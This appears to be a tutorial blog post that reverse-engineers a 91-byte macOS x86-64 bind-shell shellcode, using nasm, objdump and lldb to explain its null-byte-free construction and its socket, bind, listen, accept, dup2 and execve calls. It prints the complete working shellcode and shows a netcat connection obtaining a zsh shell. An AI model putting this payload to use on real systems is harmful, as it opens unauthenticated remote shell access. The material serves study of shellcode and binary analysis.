Abstract
In this series of articles, I am analysing the pieces of shellcode written by Odzhan on the page Shellcode: Mac OSX amd64.
In the last article, Some more shellcode I showed some basic static and dynamic binary analysis using Hopper.
In this article, a more complex task is accomplished - we want to create some code that binds a shell.
Binding a Shell
This is the wet dream of all hackers - and conversely, it is the nightmare of all blue teamers. The effect of this shellcode is opening a shell that's accessible via netcat on port 1234.
The code
We start from the code:
; 91 bytes bind shell
;
bits 64
global _main
_main:
mov eax, ~0xd2040200 & 0xFFFFFFFF
not eax
push rax
xor ebp, ebp
bts ebp, 25
; step 1, create a socket
; socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
push rbp
pop rax ; rax = 0x02000000
cdq ; rdx = IPPROTO_IP
push 1
pop rsi ; rsi = SOCK_STREAM
push 2
pop rdi ; rdi = AF_INET
mov al, 97 ; eax = sys_socket
syscall
xchg eax, edi ; edi=s
xchg eax, ebx ; ebx=2
; step 2, bind to port 1234
; bind(s, {AF_INET,1234,INADDR_ANY}, 16)
push rbp
pop rax
push rsp
pop rsi
mov dl, 16
mov al, 104
syscall
; step 3, listen
; listen(s, 0);
push rax
pop rsi
push rbp
pop rax
mov al, 106
syscall
; step 4, accept connections
; accept(s, 0, 0);
push rbp
pop rax
mov al, 30
cdq
syscall
xchg eax, edi ; edi=r
push rbx ; rsi=2
pop rsi
; step 5, assign socket handle to stdin,stdout,stderr
; dup2(r, FILENO_STDIN)
; dup2(r, FILENO_STDOUT)
; dup2(r, FILENO_STDERR)
dup_loop64:
push rbp
pop rax
mov al, 90 ; rax=sys_dup2
syscall
sub esi, 1
jns dup_loop64 ; jump if not signed
; step 6, execute /bin/zsh
; execve("/bin/zsh", {"/bin/zsh", NULL}, 0);
xor esi, esi
cdq ; rdx=0
mov rbx, '/bin/zsh'
push rdx ; 0
push rbx ; "/bin//sh"
push rsp
pop rdi ; "/bin//sh", 0
; ---------
push rbp
pop rax
mov al, 59 ; rax=sys_execve
syscall
The only detail that's been changed from the original code is the chosen shell. We opted for zsh because nowadays Apple has decided it's the default shell with MacOS. The original shell was /bin//sh
(observe the double slash...).
Running the code
In a terminal, I launch:
gbiondo@tripleX Odzhan % ./bindshell
(no output is produced)
In another terminal, I launch:
gbiondo@tripleX shellcode2 % nc localhost 1234
pwd
/Users/gbiondo/EXP312/Odzhan
time
real 0m0.001s
user 0m0.000s
sys 0m0.000s
date
Wed Apr 13 14:52:30 BST 2022
echo $SHELL
/bin/zsh
whoami
gbiondo
Try and imagine: the software you are running opens a shell that can be reachable from the outside - this is very dangerous.
Some static binary analysis
file
gbiondo@tripleX Odzhan % file bindshell
bindshell: Mach-O 64-bit executable x86_64
Nothing we didn't know before, actually
Symbol Table
gbiondo@tripleX Odzhan % objdump -m -t bindshell
bindshell:
SYMBOL TABLE:
0000000100003f96 l F __TEXT,__text dup_loop64
0000000100000000 g *ABS* __mh_execute_header
0000000100003f5d g F __TEXT,__text _main
Nothing too interesting, actually.
Section headers
gbiondo@tripleX Odzhan % objdump -m -h bindshell
Sections:
Idx Name Size VMA Type
0 __text 0000005b 0000000100003f5d TEXT
1 __unwind_info 00000048 0000000100003fb8 DATA
Also this one is not too talkative :)
Null-byte sanitization
Before doing anything else, we agree on subdividing the code into logical blocks.
We agree on the following:
- we call the preamble of the program preamble. It ends before the code introduced with the comment
; step 1, create a socket
- we will refer to the block of code between the comments
; step 1, create a socket
and; step 2, bind to port 1234
with socket - we will refer to the block of code between the comments
; step 2, bind to port 1234
and; step 3, listen
with bind - we will refer to the block of code between the comments
; step 3, listen
and; step 4, accept connections
with listen - we will refer to the block of code between the comments
; step 4, accept connections
and; step 5, assign socket handle to stdin,stdout,stderr
with accept connections - we will refer to the block of code between the comments
; step 5, assign socket handle to stdin, stdout, stderr
and; step 6, execute /bin/zsh
with handle management - we will refer to the rest of the code with shell execution
For reasons that will be evident later on, we need to have a null-byte-free code. A null-byte is actually a byte that's zeroed in the code. An example can explain the situation better. If we take a look at the opcodes in the disassembled object file of cmdRun, the program we used in Some more shellcode, in the subroutine <l_cmd64>
we see:
gbiondo@tripleX Odzhan % objdump -D -M intel cmdRun.o
cmdRun.o: file format mach-o 64-bit x86-64
Disassembly of section __TEXT,__text:
--8< --8< --8< SNIP --8< --8< --8<
0000000000000026 <l_cmd64>:
26: e8 f5 ff ff ff call 0x20 <r_cmd64>
2b: 63 61 74 movsxd esp, dword ptr [rcx + 116]
2e: 20 2f and byte ptr [rdi], ch
30: 65 74 63 je 0x96 <l_cmd64+0x70>
33: 2f <unknown>
34: 70 61 jo 0x97 <l_cmd64+0x71>
36: 73 73 jae 0xab <l_cmd64+0x85>
38: 77 64 ja 0x9e <l_cmd64+0x78>
3a: 00 <unknown>
The byte in 3a
is 00
- there is acceptable because of the structure of the program, but in general, we want to avoid these bytes.
So, now we want to check if we have any null-byte in the opcodes.
We do it part by part.
Preamble
This part is null-byte free:
gbiondo@tripleX bindshell_files % nasm -f macho64 preamble.asm
gbiondo@tripleX bindshell_files % objdump -D -M intel preamble.o
preamble.o: file format mach-o 64-bit x86-64
Disassembly of section __TEXT,__text:
0000000000000000 <_main>:
0: b8 ff fd fb 2d mov eax, 771489279
5: f7 d0 not eax
7: 50 push rax
8: 31 ed xor ebp, ebp
a: 0f ba ed 19 bts ebp, 25
Socket
Also this part is null-byte free:
gbiondo@tripleX bindshell_files % nasm -f macho64 socket.asm
gbiondo@tripleX bindshell_files % objdump -D -M intel socket.o
socket.o: file format mach-o 64-bit x86-64
Disassembly of section __TEXT,__text:
0000000000000000 <__text>:
0: 55 push rbp
1: 58 pop rax
2: 99 cdq
3: 6a 01 push 1
5: 5e pop rsi
6: 6a 02 push 2
8: 5f pop rdi
9: b0 61 mov al, 97
b: 0f 05 syscall
d: 97 xchg eax, edi
e: 93 xchg eax, ebx
Bind
Another part with no null-bytes:
gbiondo@tripleX bindshell_files % nasm -f macho64 bind.asm
gbiondo@tripleX bindshell_files % objdump -D -M intel bind.o
bind.o: file format mach-o 64-bit x86-64
Disassembly of section __TEXT,__text:
0000000000000000 <__text>:
0: 55 push rbp
1: 58 pop rax
2: 54 push rsp
3: 5e pop rsi
4: b2 10 mov dl, 16
6: b0 68 mov al, 104
8: 0f 05 syscall
Listen
No null-bytes here...
gbiondo@tripleX bindshell_files % nasm -f macho64 listen.asm
gbiondo@tripleX bindshell_files % objdump -D -M intel listen.o
listen.o: file format mach-o 64-bit x86-64
Disassembly of section __TEXT,__text:
0000000000000000 <__text>:
0: 50 push rax
1: 5e pop rsi
2: 55 push rbp
3: 58 pop rax
4: b0 6a mov al, 106
6: 0f 05 syscall
Accept connections
... nor here. Bo-ring!
gbiondo@tripleX bindshell_files % nasm -f macho64 acceptConnections.asm
gbiondo@tripleX bindshell_files % objdump -D -M intel acceptConnections.o
acceptConnections.o: file format mach-o 64-bit x86-64
Disassembly of section __TEXT,__text:
0000000000000000 <__text>:
0: 55 push rbp
1: 58 pop rax
2: b0 1e mov al, 30
4: 99 cdq
5: 0f 05 syscall
7: 97 xchg eax, edi
8: 53 push rbx
9: 5e pop rsi
Handle management
Ibid
gbiondo@tripleX bindshell_files % nasm -f macho64 handleManagement.asm
gbiondo@tripleX bindshell_files % objdump -D -M intel handleManagement.o
handleManagement.o: file format mach-o 64-bit x86-64
Disassembly of section __TEXT,__text:
0000000000000000 <dup_loop64>:
0: 55 push rbp
1: 58 pop rax
2: b0 5a mov al, 90
4: 0f 05 syscall
6: 83 ee 01 sub esi, 1
9: 79 f5 jns 0x0 <dup_loop64>
Shell execution
Ibid
gbiondo@tripleX bindshell_files % nasm -f macho64 shell.asm
gbiondo@tripleX bindshell_files % objdump -D -M intel shell.o
shell.o: file format mach-o 64-bit x86-64
Disassembly of section __TEXT,__text:
0000000000000000 <__text>:
0: 31 f6 xor esi, esi
2: 99 cdq
3: 48 bb 2f 62 69 6e 2f 2f 73 68 movabs rbx, 7526411283028599343
d: 52 push rdx
e: 53 push rbx
f: 54 push rsp
10: 5f pop rdi
11: 55 push rbp
12: 58 pop rax
13: b0 3b mov al, 59
15: 0f 05 syscall
Commentary
All these pieces of code are null-byte free on purpose. The original author has written the code as such because he wanted to have a portable shellcode.
In a subsequent article, I will explain some techniques that can be used to obtain clean shellcode. For the very moment, the objective of this part of the article was showing this part of shellcode development.
Dynamic binary analysis
Also in this case, we can use the taxonomy defined above to keep the structure a bit more readable.
If not done yet, we start with the compilation, linking of the executable. The last instruction attaches lldb to the process.
gbiondo@tripleX bindshell_files % nasm -f macho64 bindshell.asm
gbiondo@tripleX bindshell_files % ld -L /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/lib -lSystem bindshell.o -o bindshell
gbiondo@tripleX bindshell_files % lldb bindshell
We set a breakpoint in the main subroutine, and we're ready to go.
(lldb) breakpoint set -n main
Breakpoint 1: where = bindshell`main, address = 0x0000000100003f5d
Preamble
The preamble disassembled code is as follows:
bindshell[0x100003f5d] <+0>: mov eax, 0x2dfbfdff
bindshell[0x100003f62] <+5>: not eax
bindshell[0x100003f64] <+7>: push rax
bindshell[0x100003f65] <+8>: xor ebp, ebp
bindshell[0x100003f67] <+10>: bts ebp, 0x19
The readers should be familiar with the instruction mov
, by now - so I am not going to explain it. On the other hand, it is interesting to understand how ~0xd2040200 & 0xFFFFFFFF
becomes 0x2dfbfdff.
The operand &
does a bitwise AND, thus the & 0xFFFFFFFF
can be disregarded (FF is all one's, which is the neutral element for the &
operation.
The tilde ~
operand inverts the bytes. I have prepared an image that explains how the operation went here - a picture is worth more than a thousand words, after all...
We start the process and begin debugging. Before the execution of instruction at <+0>
we have:
(lldb) register read RAX EAX
rax = 0x0000000100074010 dyld`dyld4::sConfigBuffer
eax = 0x00074010
and after it, obviously, we obtain:
(lldb) register read RAX EAX
rax = 0x000000002dfbfdff
eax = 0x2dfbfdff
Now the following instruction (at <+5>
) is a NOT, and after its execution, we have:
(lldb) register read RAX EAX RSP
rax = 0x00000000d2040200
eax = 0xd2040200
rsp = 0x00007ff7bfeff818
Unsurprisingly! NOT is involutory! This has all been done in order to avoid storing null bytes.
The next instruction (<+7>
) stores the contents of RAX in the stack (so, at the address 0x00007ff7bfeff810
):
(lldb) register read RAX EAX RSP EBP
rax = 0x00000000d2040200
eax = 0xd2040200
rsp = 0x00007ff7bfeff810
ebp = 0xbfeff920
(lldb) memory read $rsp
0x7ff7bfeff810: 00 02 04 d2 00 00 00 00 1e d5 00 00 01 00 00 00 ................
0x7ff7bfeff820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
With the next instruction (<+8>
) the contents of ebp
are zeroed, and with the one after (<+10>
) its 25th bit is set to 1:
(lldb) register read RAX EAX RSP EBP
rax = 0x00000000d2040200
eax = 0xd2040200
rsp = 0x00007ff7bfeff810
ebp = 0x02000000
This closes the analysis of the first chunk.
Socket
The disassembled code for Socket is:
0x100003f6b <+14>: push rbp
0x100003f6c <+15>: pop rax
0x100003f6d <+16>: cdq
0x100003f6e <+17>: push 0x1
0x100003f70 <+19>: pop rsi
0x100003f71 <+20>: push 0x2
0x100003f73 <+22>: pop rdi
0x100003f74 <+23>: mov al, 0x61
0x100003f76 <+25>: syscall
0x100003f78 <+27>: xchg eax, edi
0x100003f79 <+28>: xchg eax, ebx
The contents of rbp
are stored in the stack (instruction <+14>
), and then retrieved and pushed into rax
(instruction <+15>
).
(lldb) register read RAX EAX RSP EBP
rax = 0x00000000d2040200
eax = 0xd2040200
rsp = 0x00007ff7bfeff808
ebp = 0x02000000
(lldb) memory read $rsp
0x7ff7bfeff808: 00 00 00 02 00 00 00 00 00 02 04 d2 00 00 00 00 ................
0x7ff7bfeff818: 1e d5 00 00 01 00 00 00 00 00 00 00 00 00 00 00 ................
and after instruction <+15>
(lldb) register read RAX EAX RSP EBP
rax = 0x0000000002000000
eax = 0x02000000
rsp = 0x00007ff7bfeff810
ebp = 0x02000000
Now, we have already seen the CDQ
instruction (converts a doubleword to a quadword) and the fact it zeroes the values of EDX
and EAX
(in this case, because the first register is positive). Shortly, before instruction <+16>
we have
(lldb) register read RSP EBP DX AX EDX EAX RDX RAX
rsp = 0x00007ff7bfeff810
ebp = 0x02000000
dx = 0xf958
ax = 0x0000
edx = 0xbfeff958
eax = 0x02000000
rdx = 0x00007ff7bfeff958
rax = 0x0000000002000000
and after it, we have
rsp = 0x00007ff7bfeff810
ebp = 0x02000000
dx = 0x0000
ax = 0x0000
edx = 0x00000000
eax = 0x02000000
rdx = 0x0000000000000000
rax = 0x0000000002000000
Then 1 is pushed in the stack (instruction <+17>
):
(lldb) memory read $rsp
0x7ff7bfeff808: 01 00 00 00 00 00 00 00 00 02 04 d2 00 00 00 00 ................
0x7ff7bfeff818: 1e d5 00 00 01 00 00 00 00 00 00 00 00 00 00 00 ................
(lldb) register read RSP EBP RSI RDI DX AX EDX EAX RDX RAX
rsp = 0x00007ff7bfeff808
ebp = 0x02000000
rsi = 0x00007ff7bfeff948
rdi = 0x0000000000000001
dx = 0x0000
ax = 0x0000
edx = 0x00000000
eax = 0x02000000
rdx = 0x0000000000000000
rax = 0x0000000002000000
and popped back into rsi
(instruction <+19>
).
(lldb) register read RSP EBP RSI RDI DX AX EDX EAX RDX RAX
rsp = 0x00007ff7bfeff810
ebp = 0x02000000
rsi = 0x0000000000000001
rdi = 0x0000000000000001
dx = 0x0000
ax = 0x0000
edx = 0x00000000
eax = 0x02000000
rdx = 0x0000000000000000
rax = 0x0000000002000000
(lldb) memory read $rsp
0x7ff7bfeff810: 00 02 04 d2 00 00 00 00 1e d5 00 00 01 00 00 00 ................
0x7ff7bfeff820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
Similarly, the instructions <+20>
and <+22>
store the value 2 in rdi
, leading to the following situation:
(lldb) register read RSP EBP RSI RDI DX AX EDX EAX RDX RAX
rsp = 0x00007ff7bfeff810
ebp = 0x02000000
rsi = 0x0000000000000001
rdi = 0x0000000000000002
dx = 0x0000
ax = 0x0000
edx = 0x00000000
eax = 0x02000000
rdx = 0x0000000000000000
rax = 0x0000000002000000
The very next instruction (<+23>
) moves 0x61
in the lowest 8 bits of eax. 0x61
in decimal is 97. If we look in the syscalls.master file, we immediately notice that this is the number associated to the syscall socket
.
Now, a man 2 socket
gives the description of the command, which in C would be invoked as follows:
#include <sys/socket.h>
int
socket(int domain, int type, int protocol);
Shortly, socket()
creates an endpoint for communication and returns a descriptor.
In the man page, we find the description of the parameters:
The domain parameter specifies a communications domain within which communication will take place; this selects the protocol family which should be used.
These families are defined in the include file
⟨sys/socket.h⟩
. The currently understood formats are:
PF_LOCAL Host-internal protocols, formerly called PF_UNIX,
PF_UNIX Host-internal protocols, deprecated, use PF_LOCAL,
PF_INET Internet version 4 protocols,
PF_ROUTE Internal Routing protocol,
PF_KEY Internal key-management function,
PF_INET6 Internet version 6 protocols,
PF_SYSTEM System domain,
PF_NDRV Raw access to network device,
PF_VSOCK VM Sockets protocols
The socket has the indicated type, which specifies the semantics of communication. Currently defined types are:
SOCK_STREAM
SOCK_DGRAM
SOCK_RAW
A
SOCK_STREAM
type provides sequenced, reliable, two-way connection based byte streams. An out-of-band data transmission mechanism may be supported. ASOCK_DGRAM
socket supports datagrams (connectionless, unreliable messages of a fixed (typically small) maximum length).SOCK_RAW
sockets provide access to internal network protocols and interfaces. The typeSOCK_RAW
, which is available only to the super-user.The protocol specifies a particular protocol to be used with the socket. Normally only a single protocol exists to support a particular socket type within a given protocol family. However, it is possible that many protocols may exist, in which case a particular protocol must be specified in this manner. The protocol number to use is particular to the “communication domain” in which communication is to take place; see protocols(5).
To understand what the author originally wanted to achieve, let's take a look at the code.
The original call to the socket()
API was intended to be:
socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
In the socket.h we find the definition of AF_INET
as follows:
#define AF_INET 2 /* internetwork: UDP, TCP, etc. */
So, AF_INET
and PF_INET
in this case behave in the same manner.
The author wants a TCP connection, so he decided to use SOCK_STREAM
.
Also SOCK_STREAM
is defined in socket.h:
#define SOCK_STREAM 1 /* stream socket */
Finally, to leverage the IP protocol, the third parameter to the function has to be IPPROTO_IP
. This is defined in the in.h header:
#define IPPROTO_IP 0 /* dummy for IP */
To recap, the call should be invoked as:
socket(2,1,0)
so:
Param. no. | Register | Required value |
---|---|---|
1 | RDI |
AF_INET = 2 |
2 | RSI |
SOCK_STREAM = 1 |
3 | RDX |
IPPROTO_IP = 0 |
Taking a look at the last status of the registers, we see that the program is ready to invoke the socket
syscall.
Let's review the contents of the registers before and after the syscall:
Register | Before | After |
---|---|---|
RAX |
0x0000000002000061 |
0x0000000000000003 |
RBX |
0x00000001000c0060 |
0x00000001000c0060 |
RCX |
0x00007ff7bfeffa80 |
0x0000000100003f78 |
RDX |
0x0000000000000000 |
0x0000000000000000 |
RDI |
0x0000000000000002 |
0x0000000000000002 |
RSI |
0x0000000000000001 |
0x0000000000000001 |
RBP |
0x0000000002000000 |
0x0000000002000000 |
RSP |
0x00007ff7bfeff870 |
0x00007ff7bfeff870 |
We observe that the values of RAX
and RCX
have changed. In fact, RAX
will contain the return value of socket
, which is a file descriptor.
The part Socket finishes with the two XCHG
instructions (<+27>
and <+28>
). The XCHG
instruction exchanges the contents of a register with the contents of another register or the contents of memory locations. It cannot exchange the contents of two memory locations directly.
The effect of these two instructions are:
- With the first one, the values of
eax
andedi
are swapped. - With the second one, the values of
eax
(former value ofedi
) andebx
are swapped.
Shortly, we have:
Register | Before | After |
---|---|---|
RAX |
0x0000000000000003 |
0x00000000000c0060 |
RBX |
0x00000001000c0060 |
0x0000000000000002 |
RDI |
0x0000000000000002 |
0x0000000000000003 |
Bind
This part is quite complex. The assembled code is not very different from the original - in fact, we have:
0x100003f7a <+29>: push rbp
0x100003f7b <+30>: pop rax
0x100003f7c <+31>: push rsp
0x100003f7d <+32>: pop rsi
0x100003f7e <+33>: mov dl, 0x10
0x100003f80 <+35>: mov al, 0x68
0x100003f82 <+37>: syscall
whilst the push
es and the pop
s look quite familiar the mov
instructions deserve some analysis.
The effect of the first two instructions is copying the contents of rbp
into rax
; and the effect of the third and fourth instructions is copying the contents of rsp
into rsi
. We show the first two instructions. With the first instruction (<+29>
), the stack base pointer is pushed to the stack, and with the next instruction, it is popped in the RAX
register. It's worth remembering that before the code was executed, the contents of RBP
was 0x0000000002000000
.
Before going any further, we observe that the code shall set the last 8 bits of rax
(this is what al
is) to 0x68
, or in decimal 104
. This is the number of syscall that will be called. A quick look in the syscalls.master file shows that this is the syscall:
104 AUE_BIND ALL { int bind(int s, caddr_t name, socklen_t namelen) NO_SYSCALL_STUB; }
so we know we need to invoke man 2 bind
from the terminal to get some more information on the API. In this case, we have:
#include <sys/socket.h>
int bind(int socket, const struct sockaddr *address, socklen_t address_len);
bind()
assigns a name to an unnamed socket. When a socket is created with socket(2) it exists in a name space (address family) but has no name assigned.bind()
requests that address be assigned to the socket.
The second parameter to this call is of type struct sockaddr
and the third is basically an integer containing the length of that structure.
We need to do some reverse engineering of the Apple XNU code, now.
The struct sockaddr
is described in the file in.h we have:
struct sockaddr_in {
__uint8_t sin_len;
sa_family_t sin_family;
in_port_t sin_port;
struct in_addr sin_addr;
char sin_zero[8];
};
In order to find the third parameter, we need to determine the sizes of all types. In the same file, we immediately find
struct in_addr {
in_addr_t s_addr;
};
so we need to give a size to the following types:
Data type | Defined in |
---|---|
sa_family_t |
_sa_family_t.h |
in_port_t |
_in_port_t.h |
in_addr |
in.h |
To speed up things, we wrote a little program to find the sizes of the integer types:
#include <iostream>
#include <inttypes.h>
using namespace std;
int main ()
{
cout << "sizeof size_t type is: " << sizeof(size_t) << " bytes\n";
cout << "sizeof char type is: " << sizeof(char) << " bytes\n";
cout << "sizeof uint8_t type is: " << sizeof(uint8_t) << " bytes\n";
cout << "sizeof __uint8_t type is: " << sizeof(__uint8_t) << " bytes\n";
cout << "sizeof uint16_t type is: " << sizeof(uint16_t) << " bytes\n";
cout << "sizeof __uint16_t type is: " << sizeof(__uint16_t) << " bytes\n";
cout << "sizeof uint32_t type is: " << sizeof(uint32_t) << " bytes\n";
cout << "sizeof __uint32_t type is: " << sizeof(__uint32_t) << " bytes\n";
cout << "sizeof uint64_t type is: " << sizeof(uint64_t) << " bytes\n";
cout << "sizeof __uint64_t type is: " << sizeof(__uint64_t) << " bytes\n";
return 0;
}
running it gives us:
sizeof size_t type is: 8 bytes
sizeof char type is: 1 bytes
sizeof uint8_t type is: 1 bytes
sizeof __uint8_t type is: 1 bytes
sizeof uint16_t type is: 2 bytes
sizeof __uint16_t type is: 2 bytes
sizeof uint32_t type is: 4 bytes
sizeof __uint32_t type is: 4 bytes
sizeof uint64_t type is: 8 bytes
sizeof __uint64_t type is: 8 bytes
So, let's enrich the previous table:
Data type | Defined in | Aliases | Size |
---|---|---|---|
char |
n/a | n/a | 1 byte |
uint8_t |
n/a | unsigned char |
1 byte |
sa_family_t |
_sa_family_t.h | __uint8_t |
1 byte |
in_port_t |
_in_port_t.h | __uint16_t |
2 bytes |
in_addr |
in.h | in_addr_t |
n/a |
in_addr_t |
_in_addr_t.h | __uint32_t |
4 bytes |
To fix the ideas, the struct sockaddr_in has the following sizes
struct sockaddr_in {
__uint8_t sin_len; //1 byte
sa_family_t sin_family; //1 byte
in_port_t sin_port; //2 bytes
struct in_addr sin_addr; //4 bytes
char sin_zero[8]; //8 bytes
};
In short, this structure is 16 bytes long. We can represent it graphically as follows:
At the very moment, the situation is as follows:
Param. no. | Register | Value |
---|---|---|
1 | RDI |
0x0000000000000003 |
2 | RSI |
0x00007ff7bfeff870 |
3 | RDX |
0x0000000000000000 |
Let's go back to the code. The effect of the instruction <+33>
is to load 0x10
= 16 to the last 8 bits of rdx
, thus setting the third parameter (the size) to the bind()
call.
In a similar way, the instruction <+35>
prepares the syscall by finalising its number.
In short, we have:
rdi = 0x0000000000000003
rsi = 0x00007ff7bfeff870
rdx = 0x0000000000000010
rax = 0x0000000002000068
Now it's interesting to see the values of the structure. Let's read 16 bytes of the stack, starting from rsi
:
(lldb) register read rsi
rsi = 0x00007ff7bfeff870
(lldb) memory read $rsi-0x10 $rsi+0x10
0x7ff7bfeff860: 14 00 00 00 00 00 00 00 70 f8 ef bf f7 7f 00 00 ........p.......
0x7ff7bfeff870: 00 02 04 d2 00 00 00 00 1e d5 00 00 01 00 00 00 ................
Now, using the graphical schema that we have shown before will help visualising memory allocation:
00 00 00 00
is a constant defined in in.h (the symbolic name is INADDR_ANY
) and represents any possible internet address - in other words, the shellcode will accept incoming connections from any host.
This closes the analysis of bind. Phew!
Listen
The disassembled code for this chunk doesn't differ from the original:
0x100003f84 <+39>: push rax
0x100003f85 <+40>: pop rsi
0x100003f86 <+41>: push rbp
0x100003f87 <+42>: pop rax
0x100003f88 <+43>: mov al, 0x6a
0x100003f8a <+45>: syscall
Here the syscall has number 106, which is defined in the syscalls.master file as follows:
106 AUE_LISTEN ALL { int listen(int s, int backlog) NO_SYSCALL_STUB; }
so, we follow the methodology that we adopted before - it should be clear by now that the first thing to do is launching man 2 listen
and analysing the result. In this case, the API is defined as follows:
#include <sys/socket.h>
int listen(int socket, int backlog);
Creation of socket-based connections requires several operations. First, a socket is created with socket(2). Next, a willingness to incoming connections and a queue limit for incoming connections are specified with listen(). Finally, the connections are accepted with accept(2). The listen() call applies only to sockets of type SOCK_STREAM.
The backlog parameter defines the maximum length for the queue of pending connections. If a connection request arrives with the queue full, the client may receive an error with an indication of ECONNREFUSED. Alternatively, if the underlying protocol supports retransmission, the request may be ignored so that retries may succeed.
In this case, we are happy with no backlog management, so we will pass a zero (NULL) value.
The instructions <+39>
to <+42>
set the contents of RSI
to those of RAX
, and the contents of RAX
to those of RBP
:
Register | Before | After |
---|---|---|
RAX |
0x0000000000000000 |
0x0000000002000000 |
RBP |
0x0000000002000000 |
0x0000000002000000 |
RSI |
0x00007ff7bfeff870 |
0x0000000000000000 |
The final effect is zeroing RSI
(which is fine, because RSI
is what is used to pass the second arguments to functions) and preparing RAX
for the syscall. The first argument to the function is passed through the register RDI
that has been set before and not changed yet.
(lldb) register read rdi
rdi = 0x0000000000000003
So, the effect of the instruction <+43>
is to set the lowest byte of rax
to 106 and prepare for the syscall which is in <+45>
.
Accepting incoming connections
I must admit I have been a little puzzled by the remaining part of the disassembled code. Before commenting, let's take a look at what we have:
bindshell[0x100003f8c] <+47>: push rbp
bindshell[0x100003f8d] <+48>: pop rax
bindshell[0x100003f8e] <+49>: mov al, 0x1e
bindshell[0x100003f90] <+51>: cdq
bindshell[0x100003f91] <+52>: syscall
bindshell[0x100003f93] <+54>: xchg eax, edi
bindshell[0x100003f94] <+55>: push rbx
bindshell[0x100003f95] <+56>: pop rsi
There is only ONE syscall invocation, and there are no jump instructions, hence no loop.
The effect of the instructions <+47>
...<+49>
is preparing the syscall. The syscall number is 0x1e
, or in decimal 30.
The reason for this is my shallowness when analysing. I disassembled the main
subroutine, but as a matter of fact, the loop takes place in a labeled environment, which is another subroutine. In fact, if I execute:
(lldb) disassemble -n dup_loop64
bindshell`dup_loop64:
bindshell[0x100003f96] <+0>: push rbp
bindshell[0x100003f97] <+1>: pop rax
bindshell[0x100003f98] <+2>: mov al, 0x5a
bindshell[0x100003f9a] <+4>: syscall
bindshell[0x100003f9c] <+6>: sub esi, 0x1
bindshell[0x100003f9f] <+9>: jns 0x100003f96 ; <+0>
bindshell[0x100003fa1] <+11>: xor esi, esi
bindshell[0x100003fa3] <+13>: cdq
bindshell[0x100003fa4] <+14>: movabs rbx, 0x68732f2f6e69622f
bindshell[0x100003fae] <+24>: push rdx
bindshell[0x100003faf] <+25>: push rbx
bindshell[0x100003fb0] <+26>: push rsp
bindshell[0x100003fb1] <+27>: pop rdi
bindshell[0x100003fb2] <+28>: push rbp
bindshell[0x100003fb3] <+29>: pop rax
bindshell[0x100003fb4] <+30>: mov al, 0x3b
bindshell[0x100003fb6] <+32>: syscall
I obtain the missing part of the code.
Now, if we look to other xnu versions, the API 30 is documented. Especially if we look at the URI: https://opensource.apple.com/source/xnu/xnu-7195.50.7.100.1/bsd/kern/syscalls.master.auto.html we have the following:
30 AUE_ACCEPT ALL { int accept(int s, caddr_t name, socklen_t *anamelen) NO_SYSCALL_STUB; }
which is more actionable. Defined as
#include <sys/socket.h>
int accept(int socket, struct sockaddr *restrict address, socklen_t *restrict address_len);
the man page for this API contains:
The argument socket is a socket that has been created with socket(2), bound to an address with bind(2), and is listening for connections after a listen(2). accept() extracts the first connection request on the queue of pending connections, creates a new socket with the same properties of socket, and allocates a new file descriptor for the socket. If no pending connections are present on the queue, and the socket is not marked as non-blocking, accept() blocks the caller until a connection is present. If the socket is marked non-blocking and no pending connections are present on the queue, accept() returns an error as described below. The accepted socket may not be used to accept more connections. The original socket socket, remains open.
The argument address is a result parameter that is filled in with the address of the connecting entity, as known to the communications layer. The exact format of the address parameter is determined by the domain in which the communication is occurring. The address_len is a value-result parameter; it should initially contain the amount of space pointed to by address; on return it will contain the actual length (in bytes) of the address returned. This call is used with connection-based socket types, currently with SOCK_STREAM.
It is possible to select(2) a socket for the purposes of doing an accept() by selecting it for read.
Now let's reverse engineer this call. The status of the registers is:
Param. no. | Register | Value |
---|---|---|
1 | RDI |
0x0000000000000003 |
2 | RSI |
0x0000000000000030 |
3 | RDX |
0x0000000000000000 |
The first parameter is the usual file descriptor for the socket. Nothing new. As for the two remaining parameters, they are not very relevant here, as they are used when storing the address of the incoming requests.
Once the syscall is executed, the program accepts incoming connections, creating a file descriptor for it.
The values of RAX
and RDI
are exchanged, so RAX
will contain the socket file descriptor and RDI
the connection file descriptor (instruction <+54>
).
The instructions <+55>
and <+56>
simply store the value of RBX
into RSI
.
Now the control flows reaches the dup_loop64
label. We enter the Handle management section.
Before getting there, let's dump the status of the registers:
(lldb) register read
General Purpose Registers:
rax = 0x0000000000000003
rbx = 0x0000000000000002
rcx = 0x0000000100003f93 bindshell`main + 54
rdx = 0x0000000000000000
rdi = 0x000000000000000e
rsi = 0x0000000000000002
rbp = 0x0000000002000000
rsp = 0x00007ff7bfeff8a0
r8 = 0x00000000001085b1
r9 = 0xffffffff00000000
r10 = 0x0000000000000000
r11 = 0x0000000000000347
r12 = 0x00000001000883a0 dyld`_NSConcreteStackBlock
r13 = 0x00007ff7bfeff958
r14 = 0x0000000100003f5d bindshell`main
r15 = 0x0000000100074010 dyld`dyld4::sConfigBuffer
rip = 0x0000000100003f96 bindshell`dup_loop64
rflags = 0x0000000000000247
cs = 0x000000000000002b
fs = 0x0000000000000000
gs = 0x0000000000000000
Handle management
We need to redirect STDIN
, STDOUT
, and STDERR
to the newly created connection. This is accomplished in this loop:
0x100003f96 <+0>: push rbp
0x100003f97 <+1>: pop rax
0x100003f98 <+2>: mov al, 0x5a
0x100003f9a <+4>: syscall
0x100003f9c <+6>: sub esi, 0x1
0x100003f9f <+9>: jns 0x100003f96 ; <+0>
Before the loop takes place, we have rsi = 0x0000000000000002
. The instructions <+6>
and <+7>
respectively decrement the register and jump to the label in case of a negative value, in other words, rsi
will take the values 2, 1, 0 throughout the loop. These are respectively the symbolic constants STDERR
, STDOUT
, and STDIN
. Since rsi
contains the second parameter to any API, this loop will have the syscall invoked with the three constants. The first three instructions instantiate the value of RAX
for the syscall.
Now, 0x5a
in decimal is 90, corresponding to the syscall:
90 AUE_DUP2 ALL { int sys_dup2(u_int from, u_int to); }
and we already know what we have to do: man 2 dup2
.
Chiefly, this call duplicates an existing object descriptor to another. In this case, this implements the redirection.
Shell execution
We already discussed this code in Come taste some shellcode....
Conclusions
This lesson has been very productive, in fact we obtained:
- learning how to produce a null-byte-free code
- reviewed some techniques to set the syscall numbers
- learned about some types' sizes
- got acquainted (hopefully!) with AMD calling conventions
- learned a methodology to investigate syscalls
